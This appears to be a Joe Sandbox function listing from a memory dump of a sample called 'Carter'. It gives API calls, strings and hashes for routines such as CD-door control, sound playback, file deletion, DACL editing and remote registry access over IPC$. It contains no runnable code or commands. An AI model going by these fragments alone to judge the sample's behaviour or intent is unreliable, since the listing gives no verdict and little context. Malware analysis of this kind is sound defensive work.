Opcode ID: 93bd56d9dd4b599c738b1e2b44661fc1ac4738b8e655da5053f60aefb3aa7e52
Instruction ID: 7f393948e8eaf700929f18964360d60b43e177602c14ba20d17ef65681e4312b
Opcode Fuzzy Hash: 93bd56d9dd4b599c738b1e2b44661fc1ac4738b8e655da5053f60aefb3aa7e52
Instruction Fuzzy Hash: 7A415F7294011AAACF14FBE0CE96DEEB7B8AF14341F600165F605B2092EF756F49CB61

Function 00AEA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

CharLowerBuffW.USER32(?,?), ref: 00AEAA0E
GetDriveTypeW.KERNEL32 ref: 00AEAA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAB08

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

Strings

closed, xrefs: 00AEAA22, 00AEAA2B
wait, xrefs: 00AEAAC5
type cdaudio alias cd wait, xrefs: 00AEAA86
set cd door , xrefs: 00AEAAA9
close, xrefs: 00AEAA14
open, xrefs: 00AEAA35
open , xrefs: 00AEAA6A
close cd wait, xrefs: 00AEAAF3

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 8693ec1d3b1ae90a6feb91778cee2772f03a0b9f8034a192064432dc35310563
Instruction ID: feb7284aed6c57bfad79289366bcdc89e37fa44054858af76bce6e8135364957
Opcode Fuzzy Hash: 8693ec1d3b1ae90a6feb91778cee2772f03a0b9f8034a192064432dc35310563
Instruction Fuzzy Hash: 6B514B712043069FC700EF11CA92D6AB7E4FF98758F50896DF896972A1DB31AD05CB52

Function 00AEA832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AEA852
__swprintf.LIBCMT ref: 00AEA874
CreateDirectoryW.KERNEL32(?,00000000), ref: 00AEA8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AEA8D6
_memset.LIBCMT ref: 00AEA8F5
_wcsncpy.LIBCMT ref: 00AEA931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AEA966
CloseHandle.KERNEL32(00000000), ref: 00AEA971
RemoveDirectoryW.KERNEL32(?), ref: 00AEA97A
CloseHandle.KERNEL32(00000000), ref: 00AEA984

Strings

\??\%s, xrefs: 00AEA86E
\, xrefs: 00AEA88A
:, xrefs: 00AEA895

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 278dd66285e8fb19f8ab7963b2850513bc50d001ecfda4648b5a950c7dce7d80
Instruction ID: e00840882c301f945e3df0cede45ea05ea0e50739a3133c32825432e12e2e33c
Opcode Fuzzy Hash: 278dd66285e8fb19f8ab7963b2850513bc50d001ecfda4648b5a950c7dce7d80
Instruction Fuzzy Hash: FB31D27251024AABDB219FA1DC48FEB73BCEF89700F5041B6F508D30A1EB74A7848B25

Function 00B0C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B0982C,?,?), ref: 00B0C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0F7
GlobalLock.KERNEL32(00000000), ref: 00B0C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C10F
GlobalUnlock.KERNEL32(00000000), ref: 00B0C118
CloseHandle.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00B13C7C,?), ref: 00B0C149
GlobalFree.KERNEL32(00000000), ref: 00B0C159
GetObjectW.GDI32(00000000,00000018,?), ref: 00B0C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B0C1A8
DeleteObject.GDI32(00000000), ref: 00B0C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B0C1E6

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 9bf057a9e07ebb255910939d1a9381b01c48d7a5555d239c3fc2bb69935fbaf3
Instruction ID: e308e16a440de1a3d5c1adcd6d6b90f21190f67d7fa8a1c9b173e296507fb409
Opcode Fuzzy Hash: 9bf057a9e07ebb255910939d1a9381b01c48d7a5555d239c3fc2bb69935fbaf3
Instruction Fuzzy Hash: F9414B75500208FFDB119F65DC88EAA7FB8EF89711F508158F905E72A0DB709981DB60

Function 00B0C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B0C8A4
GetFocus.USER32 ref: 00B0C8B4
GetDlgCtrlID.USER32(00000000), ref: 00B0C8BF
_memset.LIBCMT ref: 00B0C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B0CA15
GetMenuItemCount.USER32(?), ref: 00B0CA35
GetMenuItemID.USER32(?,00000000), ref: 00B0CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B0CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B0CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B0CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B0CB31

Strings

0, xrefs: 00B0C9E2

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 73ed0ca9f8922b5983fdbbbdb10088deb8570f96d30a0f8349c15d97697cb4f2
Instruction ID: ad7bc20434eb38681d96d4a15e916be5e6fb396565b578f2de069b5e33c6ccc3
Opcode Fuzzy Hash: 73ed0ca9f8922b5983fdbbbdb10088deb8570f96d30a0f8349c15d97697cb4f2
Instruction Fuzzy Hash: 73818B71608305AFDB10DF14C985AABBFE8FB88354F104AADF99593291CB70DD05CBA2

Function 00AD8ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
Part of subcall function 00AD8E20: GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
Part of subcall function 00AD8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
Part of subcall function 00AD8E20: HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73

Part of subcall function 00AD8EBD: GetProcessHeap.KERNEL32(00000008,00AD8916,00000000,00000000,?,00AD8916,?), ref: 00AD8EC9
Part of subcall function 00AD8EBD: HeapAlloc.KERNEL32(00000000,?,00AD8916,?), ref: 00AD8ED0
Part of subcall function 00AD8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AD8916,?), ref: 00AD8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD8B2E
_memset.LIBCMT ref: 00AD8B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AD8B62
GetLengthSid.ADVAPI32(?), ref: 00AD8B73
GetAce.ADVAPI32(?,00000000,?), ref: 00AD8BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AD8BCC
GetLengthSid.ADVAPI32(?), ref: 00AD8BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AD8BF8
HeapAlloc.KERNEL32(00000000), ref: 00AD8BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AD8C20
CopySid.ADVAPI32(00000000), ref: 00AD8C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AD8C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AD8C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AD8C92

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 5926f60c357b2184974bd5bd475c3ae741e99168c57ba99ab238afbfa3e8700d
Instruction ID: 4396501bf34a0b2f9c01422483ade888c3629a8ad36ddb87fbe38545bf3d2428
Opcode Fuzzy Hash: 5926f60c357b2184974bd5bd475c3ae741e99168c57ba99ab238afbfa3e8700d
Instruction Fuzzy Hash: 91614875910209EFDF10AFA1DD44EEEBB79BF04300F04816AF916A7290DF799A05CB60

Function 00AF7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00AF7A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AF7A85
CreateCompatibleDC.GDI32(?), ref: 00AF7A91
SelectObject.GDI32(00000000,?), ref: 00AF7A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AF7AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00AF7B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AF7B52
SelectObject.GDI32(00000006,?), ref: 00AF7B5A
DeleteObject.GDI32(?), ref: 00AF7B63
DeleteDC.GDI32(00000006), ref: 00AF7B6A
ReleaseDC.USER32(00000000,?), ref: 00AF7B75

Strings

(, xrefs: 00AF7AFA

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 9d547aece3425f95af065fdf763813507df3d31e7139c8601411319aa88643f0
Instruction ID: 3929ef2fc870f8ed2e6b49c157a2514838faa8b39d8ab59a0e7544b25599e390
Opcode Fuzzy Hash: 9d547aece3425f95af065fdf763813507df3d31e7139c8601411319aa88643f0
Instruction Fuzzy Hash: 0E515D71904309EFCB15DFA8CC89EAEBBB9EF48350F14841DFA5AA7250D771A941CB60

Function 00AEA48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AEA4D4

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00AEA4F6
__swprintf.LIBCMT ref: 00AEA54F
__swprintf.LIBCMT ref: 00AEA568
_wprintf.LIBCMT ref: 00AEA61E
_wprintf.LIBCMT ref: 00AEA63C

Strings

Error: , xrefs: 00AEA5E6
Line %d (File "%s"):, xrefs: 00AEA549, 00AEA562
^ ERROR, xrefs: 00AEA5C0
"%s" (%d) : ==> %s:%s%s, xrefs: 00AEA619
"%s" (%d) : ==> %s:, xrefs: 00AEA637

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: bb43a1855236ae99e21708cb6794a2e137c11bbc98bf3d8e24b8c0755776f8d1
Instruction ID: 916fa820d9fc6957dd68c57de1b0125657e1e5c34403a4b452fa2ed8c1578c1f
Opcode Fuzzy Hash: bb43a1855236ae99e21708cb6794a2e137c11bbc98bf3d8e24b8c0755776f8d1
Instruction Fuzzy Hash: 6551AF7194011AABCF15EBE0CE86EEEB7B9AF15340F604165F505B20A2EF316F58CB61

Function 00AE9710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE951A: __time64.LIBCMT ref: 00AE9524

Part of subcall function 00A94A8C: _fseek.LIBCMT ref: 00A94AA4

__wsplitpath.LIBCMT ref: 00AE97EF

Part of subcall function 00AA431E: __wsplitpath_helper.LIBCMT ref: 00AA435E

_wcscpy.LIBCMT ref: 00AE9802
_wcscat.LIBCMT ref: 00AE9815
__wsplitpath.LIBCMT ref: 00AE983A
_wcscat.LIBCMT ref: 00AE9850
_wcscat.LIBCMT ref: 00AE9863

Part of subcall function 00AE9560: _memmove.LIBCMT ref: 00AE9599
Part of subcall function 00AE9560: _memmove.LIBCMT ref: 00AE95A8

_wcscmp.LIBCMT ref: 00AE97AA

Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DE1
Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AE9A0D
_wcsncpy.LIBCMT ref: 00AE9A80
DeleteFileW.KERNEL32(?,?), ref: 00AE9AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AE9ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AE9ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AE9AEF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 00c950891476e95335a80a55e033a9b169375aec3dd18adde21297a2aa8aae56
Instruction ID: 3095023f62ac59f50fe565d7bb0aae3c1f0f154f901b7a083ea9bab1da3feeb1
Opcode Fuzzy Hash: 00c950891476e95335a80a55e033a9b169375aec3dd18adde21297a2aa8aae56
Instruction Fuzzy Hash: B5C13BB1A00218AADF21DF95CD85EDFB7BDAF49340F0040AAF609E7151EB709A858F65

Function 00A95BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A95BF1
GetMenuItemCount.USER32(00B47890), ref: 00AD0E7B
GetMenuItemCount.USER32(00B47890), ref: 00AD0F2B
GetCursorPos.USER32(?), ref: 00AD0F6F
SetForegroundWindow.USER32(00000000), ref: 00AD0F78
TrackPopupMenuEx.USER32(00B47890,00000000,?,00000000,00000000,00000000), ref: 00AD0F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AD0F97

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 192a7dea67b8a985c883df7a3e3c55a268a2492bb4dcffe7dea91ff83a28959b
Instruction ID: cab97db5cce7f61a7fc6afe098db7ab369d69d1d87f2c2afea590e0c72f00b87
Opcode Fuzzy Hash: 192a7dea67b8a985c883df7a3e3c55a268a2492bb4dcffe7dea91ff83a28959b
Instruction Fuzzy Hash: D371E330A44609BFEF219B65CC85FAABFA9FF04364F244217F515A62D1CBB1A850DB90

Function 00AD83FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

_memset.LIBCMT ref: 00AD8489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AD84BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AD84DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AD84F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AD8520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00AD8548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AD8553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AD8558

Strings

\CLSID, xrefs: 00AD8440
\IPC$, xrefs: 00AD84A0
SOFTWARE\Classes\, xrefs: 00AD842A

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 04784ad22b747d12018abf9147975b2245e92bc795f385894595daab571eb491
Instruction ID: 906e5ff5acd6ec8a9590a181f2135083653b01afff53c29e91e91692f9802743
Opcode Fuzzy Hash: 04784ad22b747d12018abf9147975b2245e92bc795f385894595daab571eb491
Instruction Fuzzy Hash: 0041F872D1022EABCF11EBA4DD95DEDB7B8FF04340F404569F816A3261EA759E44CB90

Function 00B0147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491

Strings

HKEY_LOCAL_MACHINE, xrefs: 00B014FA
HKCC, xrefs: 00B0155F
HKLM, xrefs: 00B0150F
HKCU, xrefs: 00B01581
HKEY_CLASSES_ROOT, xrefs: 00B01524
HKEY_USERS, xrefs: 00B01592
HKEY_CURRENT_CONFIG, xrefs: 00B0154E
HKCR, xrefs: 00B01539
HKU, xrefs: 00B015A3
HKEY_CURRENT_USER, xrefs: 00B01570

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 0d7ce15418cb88c83e97b9dce18ab3681a5badb6ccf46ee4b3a03324a9e5d23f
Instruction ID: f97a8a8cf1eb4a383f772ff72ba877b3be9fe0ddeaaf45cba8c5088abeb68a74
Opcode Fuzzy Hash: 0d7ce15418cb88c83e97b9dce18ab3681a5badb6ccf46ee4b3a03324a9e5d23f
Instruction Fuzzy Hash: E0411B3250025A8BDF08EF94D981AEA3BA4FF62344F604895FC526B292DB30ED19CB50

Function 00AE5882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

Part of subcall function 00A9153B: _memmove.LIBCMT ref: 00A915C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AE58EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AE5901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AE5912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AE5924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AE5935

Strings

play PlayMe wait, xrefs: 00AE591F
alias PlayMe, xrefs: 00AE58C4
play PlayMe, xrefs: 00AE5930
status PlayMe mode, xrefs: 00AE58E6
open , xrefs: 00AE589A
close PlayMe, xrefs: 00AE58FC, 00AE5929

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: d686f9ca0b805fe397c4b2d3a7500d4353998188bb9d9dfe2fdb93aac5080395
Instruction ID: 318a1e3be6267dc776b9cd56e925c2e4713f7a41b799c236314b008154d045e4
Opcode Fuzzy Hash: d686f9ca0b805fe397c4b2d3a7500d4353998188bb9d9dfe2fdb93aac5080395
Instruction Fuzzy Hash: 16118231A9016AB9DB20A7A2DC5ADFF7BBCEBD1B50F900469B501A30E5EE601D05C5A0

